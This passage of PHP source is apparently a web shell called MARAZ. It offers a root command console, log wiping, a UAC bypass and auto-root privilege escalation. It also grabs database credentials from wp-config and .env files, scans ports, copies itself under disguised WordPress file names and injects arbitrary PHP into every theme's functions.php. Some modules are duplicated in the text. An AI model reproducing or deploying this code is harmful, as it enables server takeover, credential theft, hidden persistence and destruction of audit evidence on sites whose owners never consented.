echo "[!] Download failed.\n";
}
echo "</pre>";
}
?>
</div>
<div class="card" style="border: 1px solid #ffd60a; background: rgba(255, 214, 10, 0.05); margin-top: 20px;">
<h4 style="margin-bottom: 15px;"><i class="fas fa-user-ninja text-accent"></i> ELITE BYPASS TOOLS (v2025)</h4>
<div style="display: grid; grid-template-columns: 1fr 1fr; gap: 10px;">
<form method="post"><button type="submit" name="bypass_uac" class="btn btn-sm" style="width: 100%; justify-content: center;"><i class="fas fa-user-shield"></i> FODHELPER UAC BYPASS</button></form>
<form method="post"><button type="submit" name="clear_logs" class="btn btn-sm" style="width: 100%; justify-content: center;"><i class="fas fa-eraser"></i> CLEAR EVENT LOGS</button></form>
</div>
<?php
if (isset($_POST['clear_logs'])) {
echo '<pre style="margin-top: 10px; background:#000;">[*] Purging system logs...\n';
root_exec_system("wevtutil cl System && wevtutil cl Setup && wevtutil cl Security");
echo "[+] CLEANED.</pre>";
}
?>
</div>
<br>
<?php elseif(isset($_GET['linr00t'])): ?>
<div class="title-section">
<h1>LINUX <span>MARAZ</span></h1>
<p style="color: var(--text-dim);">Kernel Privilege Escalation & System Analysis</p>
</div>
<div style="display: grid; grid-template-columns: 1fr 350px; gap: 25px;">
<div class="left-col">
<div class="card">
<h3 style="margin-bottom: 20px;"><i class="fas fa-search text-primary"></i> System Diagnostics</h3>
<div style="display: grid; grid-template-columns: 1fr 1fr; gap: 15px;">
<div class="info-item"><span class="info-label">Kernel:</span> <span class="info-value"><?= root_exec('uname -r') ?></span></div>
<div class="info-item"><span class="info-label">Architecture:</span> <span class="info-value"><?= root_exec('uname -m') ?></span></div>
<div class="info-item"><span class="info-label">Distribution:</span> <span class="info-value"><?= root_exec('cat /etc/issue | head -n 1') ?></span></div>
<div class="info-item"><span class="info-label">GLIBC:</span> <span class="info-value"><?= root_exec('ldd --version | head -n 1') ?></span></div>
<div class="info-item"><span class="info-label">Uptime:</span> <span class="info-value"><?= root_exec('uptime -p') ?></span></div>
<div class="info-item"><span class="info-label">Current User:</span> <span class="info-value text-accent"><?= root_exec('id') ?></span></div>
</div>
</div>
<div class="card">
<h3 style="margin-bottom: 20px;"><i class="fas fa-terminal text-primary"></i> Root Console</h3>
<form method="post">
<div style="display: flex; gap: 10px;">
<input type="text" name="lin_cmd" value="<?= htmlspecialchars($_POST['lin_cmd'] ?? 'id; whoami') ?>" placeholder="Enter command to run as root...">
<button type="submit" name="run_lin_cmd" class="btn btn-primary">EXECUTE</button>
</div>
</form>
<?php if (isset($_POST['run_lin_cmd'])): ?>
<pre style="margin-top: 15px; background: #000; color: #0f0; padding: 15px; border-radius: 8px; font-family: monospace; border: 1px solid #333;"><?= htmlspecialchars(root_exec($_POST['lin_cmd'])) ?></pre>
<?php endif; ?>
</div>
<div class="card">
<h3 style="margin-bottom: 20px;"><i class="fas fa-shield-alt text-primary"></i> SUID Binary Search</h3>
<p style="font-size: 12px; color: var(--text-dim); margin-bottom: 15px;">Scanning for binaries with the SUID bit set (potential escalation vectors).</p>
<pre style="max-height: 200px; overflow: auto; font-size: 11px; background: rgba(0,0,0,0.2); padding: 10px;"><?= root_exec('find /usr/bin /usr/sbin -perm -4000 -size -2M 2>/dev/null | head -n 15') ?></pre>
</div>
</div>
<div class="right-col">
<div class="card" style="height: 100%;">
<h3 style="margin-bottom: 20px;"><i class="fas fa-history text-primary"></i> Exploit Log</h3>
<div id="log-container" style="background: #000; height: 400px; padding: 15px; border-radius: 8px; font-family: 'JetBrains Mono', monospace; font-size: 11px; overflow-y: auto; color: #aaa; border: 1px solid #333;">
<?php
if (isset($_SESSION['root_log'])) {
foreach ($_SESSION['root_log'] as $log) {
echo "<div>" . htmlspecialchars($log) . "</div>";
}
} else {
echo "<div class='text-dim'>Standing by for operations...</div>";
}
?>
</div>
<div style="margin-top: 20px;">
<form method="post">
<input type="hidden" name="action" value="auto_root">
<button type="submit" class="btn btn-primary" style="width: 100%; justify-content: center;">
<i class="fas fa-bolt"></i> RUN AUTO-ROOT
</button>
</form>
<button class="btn" style="width: 100%; margin-top: 10px; justify-content: center;" onclick="window.location.href='?linr00t&clear_log=1'">
<i class="fas fa-trash-alt"></i> CLEAR LOG
</button>
</div>
</div>
</div>
</div>
<?php
if (isset($_GET['clear_log'])) {
$_SESSION['root_log'] = [];
header("Location: ?linr00t"); exit;
}
?>
<?php elseif(isset($_GET['scan'])): ?>
<div class="title-section">
<h1>BACKDOOR <span>SCANNER</span></h1>
<p style="color: var(--text-dim);">Advanced Heuristic & Pattern Based Analysis</p>
</div>
<div class="card">
<div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 25px;">
<div>
<h3 style="margin-bottom: 5px;"><i class="fas fa-shield-alt text-primary"></i> System Integrity Check</h3>
<?php $scan_base = root_find_scan_base(); ?>
<p style="font-size: 13px; color: var(--text-dim);">Auto-Detected Root: <span class="text-accent"><?= htmlspecialchars($scan_base) ?></span></p>
</div>
<button class="btn btn-primary" onclick="window.location.href='?scan&do_scan=1'">
<i class="fas fa-play"></i> START FULL SCAN
</button>
</div>
<?php if (isset($_GET['do_scan'])): ?>
<?php
$results = [];
$scan_base = root_find_scan_base();
root_scanner_scan($scan_base, $results);
usort($results, function($a, $b) { return $b['score'] - $a['score']; });
?>
<div style="margin-bottom: 20px;">
<span class="badge-system">FILES CHECKED: UNLIMITED</span>
<span class="badge-system" style="margin-left: 10px;">THREATS FOUND: <?= count($results) ?></span>
</div>
<table class="data-table">
<thead>
<tr><th>Danger</th><th>File Path</th><th>Detected Patterns</th><th>Size</th><th>Action</th></tr>
</thead>
<tbody>
<?php foreach($results as $r):
$color = $r['score'] >= 50 ? 'var(--primary)' : ($r['score'] >= 30 ? 'orange' : 'var(--accent)');
?>
<tr>
<td>
<div style="display: flex; align-items: center; gap: 8px;">
<div style="width: 10px; height: 10px; border-radius: 50%; background: <?= $color ?>; box-shadow: 0 0 10px <?= $color ?>;"></div>
<b style="color: <?= $color ?>;"><?= $r['score'] ?>%</b>
</div>
</td>
<td><span style="font-size: 11px; word-break: break-all;"><?= htmlspecialchars($r['path']) ?></span></td>
<td>
<div style="display: flex; flex-wrap: wrap; gap: 4px;">
<?php foreach($r['matches'] as $m): ?>
<span style="background: rgba(255,255,255,0.05); padding: 2px 5px; border-radius: 3px; font-size: 9px;"><?= htmlspecialchars($m) ?></span>
<?php endforeach; ?>
</div>
</td>
<td style="font-size: 11px;"><?= formatSizeUnits($r['size']) ?></td>
<td>
<a href="?p=<?= encodePath(dirname($r['path'])) ?>&e=<?= urlencode(basename($r['path'])) ?>" class="btn btn-sm"><i class="fas fa-code"></i> Edit</a>
</td>
</tr>
<?php endforeach; if(empty($results)): ?>
<tr><td colspan="5" style="text-align: center; padding: 50px; color: var(--text-dim);">No suspicious files found in this directory.</td></tr>
<?php endif; ?>
</tbody>
</table>
<?php else: ?>
<div style="text-align: center; padding: 60px; border: 2px dashed var(--border); border-radius: 12px;">
<i class="fas fa-search-plus" style="font-size: 3rem; color: var(--border); margin-bottom: 20px; display: block;"></i>
<h4 style="color: var(--text-dim);">Click the button above to start a deep recursive scan.</h4>
<p style="font-size: 12px; color: rgba(255,255,255,0.2); margin-top: 10px;">The scanner looks for eval, exec, base64, and other shell-like patterns used in backdoors.</p>
</div>
<?php endif; ?>
</div>
<?php if(isset($_POST['mass_infect'])):
$code = $_POST['infect_code'];
$count_fnc = 0;
$scan_root = root_find_scan_base();
try {
$it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($scan_root, RecursiveDirectoryIterator::SKIP_DOTS));
foreach($it as $f) {
$nm = $f->getFilename();
$p = $f->getRealPath();
if($nm == 'functions.php' && strpos($p, 'wp-content' . DIRECTORY_SEPARATOR . 'themes') !== false) {
$c = @file_get_contents($p);
if($c && strpos($c, 'MARAZSHELL_SIG') === false) {
@file_put_contents($p, $c . "\n<?php " . $code . " ?>");
$count_fnc++;
}
}
}
} catch(Exception $e) {}
echo "<div class='card status-on'>Infected $count_fnc WordPress theme functions.php files!</div>";
endif; ?>
<?php elseif(isset($_GET['configs'])): ?>
<div class="title-section">
<h1>CONFIG <span>GRABBER</span></h1>
<p style="color: var(--text-dim);">Automated Sensitive Data Extraction</p>
</div>
<div class="card">
<table class="data-table">
<thead><tr><th>File</th><th>Type</th><th>Size</th><th>Action</th></tr></thead>
<tbody>
<?php
$patterns = ['wp-config.php', '.env', 'configuration.php', 'config.php', 'db.php', 'database.php', 'settings.php', '.htpasswd', '.bash_history', 'web.config', 'id_rsa', '.sql', 'backup.sql', 'ssh_config', 'config.json'];
$base = root_find_scan_base();
$found_configs = [];
$res = root_exec("find $base -maxdepth 8 -type f \( -name '*.env' -o -name 'wp-config.php' -o -name 'config*.php' -o -name 'database.php' -o -name '.bash_history' -o -name 'web.config' -o -name 'id_rsa' \) -size -1M 2>/dev/null | head -n 50");
if($res) {
foreach(explode("\n", trim($res)) as $path) if($path && @file_exists($path)) $found_configs[] = realpath($path);
}
if(count($found_configs) < 5) {
try {
$di = new RecursiveDirectoryIterator($base, RecursiveDirectoryIterator::SKIP_DOTS);
$it = new RecursiveIteratorIterator($di);
$it->setMaxDepth(5);
foreach($it as $file) {
if($file->isFile() && $file->getSize() < 1048576) {
$fn = $file->getFilename();
foreach($patterns as $pat) {
if(stripos($fn, str_replace('*','',$pat)) !== false) {
$found_configs[] = $file->getRealPath();
break;
}
}
}
if(count($found_configs) > 100) break;
}
} catch(Exception $e) {}
}
$found_configs = array_unique($found_configs);
foreach($found_configs as $path): ?>
<tr>
<td><span style="font-size:11px;"><?= htmlspecialchars($path) ?></span></td>
<td><span class="badge-system"><?= strtoupper(pathinfo($path, PATHINFO_EXTENSION) ?: 'HINT') ?></span></td>
<td><?= @formatSizeUnits(@filesize($path)) ?></td>
<td>
<div style="display: flex; gap: 5px;">
<a href="?p=<?= encodePath(dirname($path)) ?>&e=<?= urlencode(basename($path)) ?>" class="btn btn-sm"><i class="fas fa-eye"></i> View</a>
<a href="?p=<?= encodePath(dirname($path)) ?>" class="btn btn-sm"><i class="fas fa-folder"></i> Path</a>
</div>
</td>
</tr>
<?php endforeach; if(empty($found_configs)): ?>
<tr><td colspan="4" style="text-align: center; padding: 50px; color: var(--text-dim);">No sensitive files found in <?= htmlspecialchars($base) ?></td></tr>
<?php endif; ?>
</tbody>
</table>
</div>
<?php elseif(isset($_GET['portscan'])): ?>
<div class="title-section">
<h1>PORT <span>SCANNER</span></h1>
<p style="color: var(--text-dim);">Internal Network Reconnaissance</p>
</div>
<div class="card">
<form method="post">
<div style="display: flex; gap: 10px; margin-bottom: 20px;">
<input type="text" name="target_host" value="127.0.0.1" placeholder="Target IP/Host" style="flex:2;">
<input type="text" name="target_ports" value="21,22,80,443,3306,3389,8080" placeholder="Ports (comma separated)" style="flex:3;">
<button type="submit" name="do_portscan" class="btn btn-primary">SCAN</button>
</div>
</form>
<?php if(isset($_POST['do_portscan'])): ?>
<div style="display: grid; grid-template-columns: repeat(auto-fill, minmax(120px, 1fr)); gap: 10px;">
<?php
$host = $_POST['target_host'];
$ports = explode(',', $_POST['target_ports']);
foreach($ports as $port):
$port = trim($port);
$fp = @fsockopen($host, $port, $errno, $errstr, 0.5);
$status = $fp ? 'status-on' : 'status-off';
if($fp) fclose($fp);
echo "<div class='badge-system' style='padding:10px; text-align:center;'>Port $port: <span class='$status'>" . ($fp ? 'OPEN' : 'CLOSED') . "</span></div>";
endforeach;
?>
</div>
<?php endif; ?>
</div>
<?php elseif(isset($_GET['b4ckd00rcr3at3'])): ?>
<div class="title-section">
<h1>BACKDOOR <span>CREATOR</span></h1>
<p style="color: var(--text-dim);">Recursive Stealth Injection & Persistence</p>
</div>
<div class="card">
<h3 style="margin-bottom: 20px;"><i class="fas fa-biohazard text-primary"></i> Multi-Point Infection Engine</h3>
<p style="margin-bottom: 20px; font-size: 14px; color: var(--text-dim);">This module will clone the entire shell and spread it into randomized, deep directories (prioritizing WordPress core/plugin folders) to ensure persistence.</p>
<form method="post" style="display: flex; gap: 10px;">
<button type="submit" name="create_bd" class="btn btn-primary" style="padding: 15px 30px; font-weight: bold; flex: 1;">
<i class="fas fa-bolt"></i> INITIATE GLOBAL INFECTION
</button>
</form>
<div style="margin-top: 40px; padding-top: 20px; border-top: 1px dashed var(--border);">
<h3 style="margin-bottom: 15px;"><i class="fas fa-microchip text-primary"></i> WP Deep Core Persistence</h3>
<p style="font-size: 13px; color: var(--text-dim); margin-bottom: 15px;">Injects an encrypted self-healing "Guard" into deep WordPress files (wp-includes). This will monitor and recreate `hedef.php` if it gets deleted, with Telegram alert.</p>
<form method="post">
<button type="submit" name="wp_deep_persistence" class="btn btn-accent" style="width: 100%; justify-content: center; height: 50px; font-weight: bold;">
<i class="fas fa-shield-virus"></i> DEPLOY DEEP PERSISTENCE
</button>
</form>
</div>
<div style="margin-top: 40px; padding-top: 20px; border-top: 1px dashed var(--border);">
<h3 style="margin-bottom: 15px;"><i class="fas fa-ghost text-primary"></i> Stealth BozCloak (Cloaking & Hide)</h3>
<p style="font-size: 13px; color: var(--text-dim); margin-bottom: 15px;">Injects a Stealth Cloaking plugin into `mu-plugins`. This hides `mu-plugins` from the dashboard and provides Google-bot cloaking with a hidden editor.</p>
<form method="post">
<button type="submit" name="wp_stealth_cloak" class="btn btn-accent" style="width: 100%; justify-content: center; height: 50px; font-weight: bold; background: #222;">
<i class="fas fa-mask"></i> DEPLOY STEALTH CLOAK
</button>
</form>
</div>
<div style="margin-top: 40px; padding-top: 20px; border-top: 1px dashed var(--border);">
<h3 style="margin-bottom: 15px;"><i class="fas fa-syringe text-primary"></i> Mass Theme Injector</h3>
<p style="font-size: 13px; color: var(--text-dim); margin-bottom: 15px;">Injects code into every WordPress theme `functions.php` file found on the server.</p>
<form method="post">
<textarea name="infect_code" style="height: 100px; margin-bottom: 15px;" placeholder="PHP code to inject... (e.g. system($_GET['cmd']);)"></textarea>
<button type="submit" name="mass_infect" class="btn btn-danger" style="width: 100%; justify-content: center;">
<i class="fas fa-biohazard"></i> RUN THEME INFECTION
</button>
</form>
</div>
<?php
if (isset($_POST['create_bd'])) {
$self_content = @file_get_contents(__FILE__);
$base_dir = rtrim($_SERVER['DOCUMENT_ROOT'] ?? getcwd(), '/');
$potential_targets = [];
try {
if (class_exists('RecursiveDirectoryIterator')) {
$it = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($base_dir, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST
);
foreach ($it as $file) {
if ($file->isDir()) {
$p = $file->getRealPath();
if ($p && (strpos($p, 'wp-') !== false || strpos($p, 'node_modules') !== false || strpos($p, 'vendor') !== false)) {
$potential_targets[] = $p;
}
}
if (count($potential_targets) > 500) break;
}
}
} catch (Exception $e) { }
if (empty($potential_targets)) {
$potential_targets = [$base_dir];
foreach (glob($base_dir . '/*', GLOB_ONLYDIR) as $d) $potential_targets[] = $d;
}
shuffle($potential_targets);
$selected = array_slice($potential_targets, 0, rand(6, 10));
$stealth_names = [
'class-wp-util.php', 'wp-db-manager.php', 'admin-ajax-cache.php',
'wp-core-debug.php', 'class.wp-scripts.php', 'file-manager-internal.php',
'wp-load-extra.php', 'security-check.php', 'compat-fix.php', 'wp-sys-init.php'
];
echo "<div style='margin-top: 30px; padding: 20px; background: rgba(0,0,0,0.2); border-left: 4px solid var(--primary); border-radius: 8px;'>";
echo "<h4 style='margin-bottom: 15px;'>Infection Report:</h4>";
$results = [];
foreach ($selected as $dir) {
$fname = $stealth_names[array_rand($stealth_names)];
$full_path = $dir . DIRECTORY_SEPARATOR . $fname;
if (root_write_file($full_path, $self_content)) {
$root_doc = realpath($_SERVER['DOCUMENT_ROOT'] ?? getcwd());
$rel_url = str_replace($root_doc, '', realpath($full_path));
$rel_url = str_replace('\\', '/', $rel_url);
if (substr($rel_url, 0, 1) !== '/') $rel_url = '/' . $rel_url;
$protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' || $_SERVER['SERVER_PORT'] == 443) ? "https://" : "http://";
$host = $_SERVER['HTTP_HOST'] ?? 'localhost';
$full_url = $protocol . $host . $rel_url;
$results[] = "<span style='color: #0f0;'>[SUCCESS]</span> <a href='$full_url' target='_blank' style='color: var(--accent); font-weight: bold;'>$full_url</a>";
} else {
$results[] = "<span style='color: #f00;'>[FAILED]</span> " . htmlspecialchars($full_path) . " (Permission Denied)";
}
}
echo implode("<br>", $results);
echo "</div>";
}
?>
</div>
<?php elseif(isset($_GET['configs'])): ?>
<div class="title-section">
<h1>CONFIG <span>GRABBER</span></h1>
<p style="color: var(--text-dim);">Automated Credential Discovery Engine</p>
<button class="btn btn-primary" onclick="window.location.href='?configs&scan=1'"><i class="fas fa-search"></i> START SYSTEM SCAN</button>
</div>
<?php if(isset($_GET['scan'])): ?>
<div class="card" style="margin-bottom: 20px;">
<h3 style="margin-bottom: 15px; font-size: 14px;"><i class="fas fa-satellite-dish"></i> Scanning Server for Configs...</h3>
<div style="font-size: 11px; color: var(--text-dim);">Searching in: <?= htmlspecialchars(root_find_scan_base()) ?></div>
</div>
<?php
$all_files = root_find_all_configs(root_find_scan_base());
$found_creds = [];
foreach($all_files as $f) {
$creds = root_extract_creds($f);
if ($creds) $found_creds[] = $creds;
}
if (empty($found_creds)): ?>
<div class="card" style="text-align: center; color: var(--danger);">No configuration credentials could be extracted.</div>
<?php else: ?>
<div style="display: grid; grid-template-columns: repeat(auto-fill, minmax(350px, 1fr)); gap: 20px;">
<?php foreach($found_creds as $c): ?>
<div class="card" style="border-left: 4px solid var(--accent); position: relative;">
<div style="position: absolute; top: 15px; right: 15px;">
<span class="badge-system" style="background: rgba(0, 112, 243, 0.1); color: var(--accent);"><?= $c['type'] ?></span>
</div>
<h4 style="margin-bottom: 15px; font-size: 13px; max-width: 80%;"><?= basename(dirname($c['file'])) ?> <span style="font-weight: normal; color: var(--text-dim); font-size: 10px;">/ <?= basename($c['file']) ?></span></h4>
<div style="font-family: 'JetBrains Mono', monospace; font-size: 11px; margin-bottom: 20px;">
<div style="margin-bottom: 4px;"><span style="color: var(--text-muted);">Host:</span> <?= htmlspecialchars($c['host']) ?></div>
<div style="margin-bottom: 4px;"><span style="color: var(--text-muted);">User:</span> <span style="color: var(--primary);"><?= htmlspecialchars($c['user']) ?></span></div>
<div style="margin-bottom: 4px;"><span style="color: var(--text-muted);">Pass:</span> <span style="color: var(--success);"><?= htmlspecialchars($c['pass']) ?: '<em>Empty</em>' ?></span></div>
<div style="margin-bottom: 4px;"><span style="color: var(--text-muted);">DB:</span> <span style="color: var(--accent); font-weight: bold;"><?= htmlspecialchars($c['db']) ?></span></div>
</div>
<div style="display: flex; gap: 10px;">
<button class="btn btn-sm" style="flex: 1;" onclick="connectDB('<?= addslashes($c['host']) ?>','<?= addslashes($c['user']) ?>','<?= addslashes($c['pass']) ?>','<?= addslashes($c['db']) ?>')">CONNECT</button>
<?php if($c['type'] == 'WordPress'): ?>
<button class="btn btn-sm" style="background: #21759b; color:#fff;" onclick="window.location.href='?wp&manual_wp_path=<?= urlencode(dirname($c['file'])) ?>'">WP LOGIN</button>
<?php endif; ?>
<a href="?p=<?= encodePath(dirname($c['file'])) ?>" class="btn btn-sm"><i class="fas fa-folder-open"></i></a>
</div>
</div>
<?php endforeach; ?>
</div>
<script>
function connectDB(h,u,p,d) {
window.location.href = `?db&h=${encodeURIComponent(h)}&u=${encodeURIComponent(u)}&p=${encodeURIComponent(p)}&d=${encodeURIComponent(d)}`;
}
</script>
<?php endif; ?>
<?php else: ?>
<div class="card" style="text-align: center; padding: 60px;">
<i class="fas fa-key" style="font-size: 48px; color: var(--text-muted); margin-bottom: 20px;"></i>
<h3>Ready to Grab Configs</h3>
<p style="color: var(--text-dim); margin-top: 10px;">This module will aggressively search for database credentials in common web app configuration files.</p>
</div>
<?php endif; ?>
<?php elseif(isset($_GET['portscan'])): ?>
<div class="title-section">
<h1>PORT <span>SCANNER</span></h1>
<p style="color: var(--text-dim);">Internal Network Reconnaissance</p>
</div>
<div class="card">
<form method="post">
<div style="display: flex; gap: 10px; margin-bottom: 20px;">
<input type="text" name="target_host" value="127.0.0.1" placeholder="Target IP/Host" style="flex:2;">
<input type="text" name="target_ports" value="21,22,80,443,3306,3389,8080" placeholder="Ports (comma separated)" style="flex:3;">
<button type="submit" name="do_portscan" class="btn btn-primary">SCAN</button>
</div>
</form>
<?php if(isset($_POST['do_portscan'])): ?>
<div style="display: grid; grid-template-columns: repeat(auto-fill, minmax(120px, 1fr)); gap: 10px;">
<?php
$host = $_POST['target_host'];
$ports = explode(',', $_POST['target_ports']);
foreach($ports as $port):
$port = trim($port);
$fp = @fsockopen($host, $port, $errno, $errstr, 0.5);
$status = $fp ? 'status-on' : 'status-off';
if($fp) fclose($fp);
echo "<div class='badge-system' style='padding:10px; text-align:center;'>Port $port: <span class='$status'>" . ($fp ? 'OPEN' : 'CLOSED') . "</span></div>";
endforeach;
?>
</div>
<?php endif; ?>
</div>
<?php elseif(isset($_GET['e'])): ?>
<div class="title-section">
<h1>FILE <span>EDITOR</span></h1>
<a href="?p=<?= encodePath(PATH) ?>" class="btn">BACK</a>
</div>
<div class="card">
<form method="post">
<h3 style="margin-bottom: 15px;"><?= htmlspecialchars($_GET['e']) ?></h3>
<textarea name="content" style="height: 500px; font-family: 'JetBrains Mono', monospace; background: #000; border: 1px solid #333; font-size: 12px; line-height: 1.6; color: #00ff00;"><?= htmlspecialchars(file_get_contents(PATH . DIRECTORY_SEPARATOR . $_GET['e'])) ?></textarea>
<div style="margin-top: 20px; text-align: right;">
<button type="submit" name="edit" class="btn"><i class="fas fa-save"></i> SAVE FILE</button>
</div>
</form>
</div>
<?php elseif(isset($_GET['r'])): ?>
<div class="card" style="max-width: 500px; margin: 100px auto;">
<h2 style="margin-bottom: 20px;">RENAME ITEM</h2>
<form method="post">
<input type="text" name="new_name" value="<?= htmlspecialchars($_GET['r']) ?>" autofocus>
<div style="margin-top: 20px; display: flex; gap: 10px;">
<button type="submit" name="rename" class="btn btn-primary" style="flex: 1;">RENAME</button>
<a href="?p=<?= encodePath(PATH) ?>" class="btn" style="flex: 1;">CANCEL</a>
</div>
</form>
</div>
<?php else: ?>
<div class="title-section">
<h1>FILE <span>MANAGER</span></h1>
<div style="display: flex; gap: 10px;">
<button class="btn" onclick="toggle('create-panel')"><i class="fas fa-plus-circle"></i> NEW ENTRY</button>
<button class="btn btn-primary" onclick="toggle('upload-box')"><i class="fas fa-cloud-upload-alt"></i> Upload</button>
</div>
</div>
<div id="create-panel" class="card hidden animate__animated animate__fadeInDown">
<h3 style="margin-bottom: 15px;"><i class="fas fa-plus-circle text-primary"></i> Create New Item</h3>
<div style="display: grid; grid-template-columns: 1fr 150px; gap: 10px; margin-bottom: 15px;">
<input type="text" id="new_item_name" placeholder="Name (e.g. index.php or /assets)">
<select id="new_item_type" style="background: rgba(255,255,255,0.05); border: 1px solid var(--border); color: #fff; padding: 10px; border-radius: 6px;">
<option value="file">FILE</option>
<option value="folder">FOLDER</option>
</select>
</div>
<textarea id="new_item_content" style="height: 150px; margin-bottom: 15px;" placeholder="Initial content for the file..."></textarea>
<div style="display: flex; gap: 10px; justify-content: flex-end;">
<button class="btn" onclick="toggle('create-panel')">CANCEL</button>
<button class="btn btn-primary" onclick="submitCreate()">CREATE NOW</button>
</div>
<script>
function submitCreate() {
const name = document.getElementById('new_item_name').value;
const type = document.getElementById('new_item_type').value;
const content = document.getElementById('new_item_content').value;
if(!name) return alert('Name required');
const fd = new FormData();
fd.append('fm_action', type === 'file' ? 'create_file' : 'create_folder');
fd.append('name', name);
if(type === 'file') fd.append('content', content);
fetch('?ajax&p=<?= encodePath(PATH) ?>', { method: 'POST', body: fd }).then(r => r.json()).then(data => {
alert(data.message); if(data.status === 'success') window.location.reload();
});
}
</script>
</div>
<div class="breadcrumb">
<i class="fas fa-home"></i>
<?php
$parts = explode(DIRECTORY_SEPARATOR, PATH);
$built = '';
foreach($parts as $id => $part):
if($part === '') continue;
$built .= ($id == 0 ? '' : DIRECTORY_SEPARATOR) . $part;
echo " <span style='opacity: 0.3;'>/</span> <a href='?p=".encodePath($built)."'>".htmlspecialchars($part)."</a>";
endforeach;
?>
</div>
<div id="upload-box" class="card hidden animate__animated animate__fadeInDown">
<form method="post" enctype="multipart/form-data">
<input type="file" name="fileToUpload" style="margin-bottom: 20px;">
<button type="submit" name="upload" class="btn btn-primary">START UPLOAD</button>
</form>
</div>
<div class="card" style="padding: 0; overflow: hidden;">
<table class="data-table">
<thead>
<tr><th>Name</th><th>Size</th><th>Date</th><th>Perms</th><th>Actions</th></tr>
</thead>
<tbody>
<?php
$items = scandir(PATH);
$dirs = []; $fs = [];
foreach($items as $i) { if($i=='.'||$i=='..') continue; if(is_dir(PATH.DIRECTORY_SEPARATOR.$i)) $dirs[]=$i; else $fs[]=$i; }
foreach($dirs as $d): $p = PATH.DIRECTORY_SEPARATOR.$d;
?>
<tr>
<td><a href="?p=<?= encodePath($p) ?>" style="text-decoration:none; color:inherit; font-weight:bold;"><i class="fas fa-folder text-primary"></i> <?= htmlspecialchars($d) ?></a></td>
<td class="text-dim">--</td>
<td style="font-size: 11px;"><?= date("Y-m-d H:i", filemtime($p)) ?></td>
<td><span style="color: var(--accent);"><?= substr(sprintf('%o', fileperms($p)), -4) ?></span></td>
<td style="text-align: right; display: flex; gap: 5px; justify-content: flex-end;">
<a href="?q=<?= encodePath(PATH) ?>&r=<?= urlencode($d) ?>" class="btn btn-sm"><i class="fas fa-edit"></i></a>
<a href="?q=<?= encodePath(PATH) ?>&d=<?= urlencode($d) ?>" class="btn btn-sm btn-danger" onclick="return confirm('Delete?')"><i class="fas fa-trash"></i></a>
</td>
</tr>
<?php endforeach; ?>
<?php foreach($fs as $f): $p = PATH.DIRECTORY_SEPARATOR.$f; ?>
<tr>
<td><?= fileIcon($f) ?> <?= htmlspecialchars($f) ?></td>
<td style="font-size: 11px;"><?= formatSizeUnits(filesize($p)) ?></td>
<td style="font-size: 11px;"><?= date("Y-m-d H:i", filemtime($p)) ?></td>
<td><span style="color: var(--accent);"><?= substr(sprintf('%o', fileperms($p)), -4) ?></span></td>
<td style="text-align: right; display: flex; gap: 5px; justify-content: flex-end;">
<a href="?q=<?= encodePath(PATH) ?>&e=<?= urlencode($f) ?>" class="btn btn-sm"><i class="fas fa-code"></i></a>
<a href="?q=<?= encodePath(PATH) ?>&r=<?= urlencode($f) ?>" class="btn btn-sm"><i class="fas fa-edit"></i></a>
<a href="?q=<?= encodePath(PATH) ?>&d=<?= urlencode($f) ?>" class="btn btn-sm btn-danger" onclick="return confirm('Delete?')"><i class="fas fa-trash"></i></a>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
<?php endif; ?>
</main>
</div>
</body>
</html>